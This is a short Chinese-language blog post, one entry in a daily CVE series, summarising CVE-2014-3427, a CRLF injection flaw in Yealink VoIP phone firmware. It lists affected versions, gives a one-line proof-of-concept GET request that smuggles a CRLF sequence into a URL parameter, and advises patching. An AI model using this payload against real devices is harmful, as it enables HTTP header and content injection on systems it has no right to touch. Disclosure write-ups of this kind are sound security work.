iT邦幫忙

DAY 29
1

天天CVE系列 第 29

Yealink VoIP Phones CRLF 漏洞 -- CVE-2014-3427

  • 分享至 

  • xImage
  •  

簡介

Yealink VoIP Phones 有 CRLF 漏洞,造成可以注入任意 HTTP Header 或任意網頁內容。

Warning

  • Firmware Version 28.72.0.2
  • Hardware Version 28.2.0.128.0.0.0

PoC

GET /servlet?linepage=1&model=%0d%0a%20 ANYTHING I WANT GOES HERE &p=dsskey&q=load HTTP/1.1

結論

打 Patch 更新 。

參考資料:http://seclists.org/fulldisclosure/2014/Jun/74


上一篇
Windows PowerPoint 漏洞 --CVE-2014-4114
下一篇
Yealink VoIP Phones XSS 漏洞 -- CVE-2014-3428
系列文
天天CVE30
圖片
  直播研討會
圖片
{{ item.channelVendor }} {{ item.webinarstarted }} |
{{ formatDate(item.duration) }}
直播中

尚未有邦友留言

立即登入留言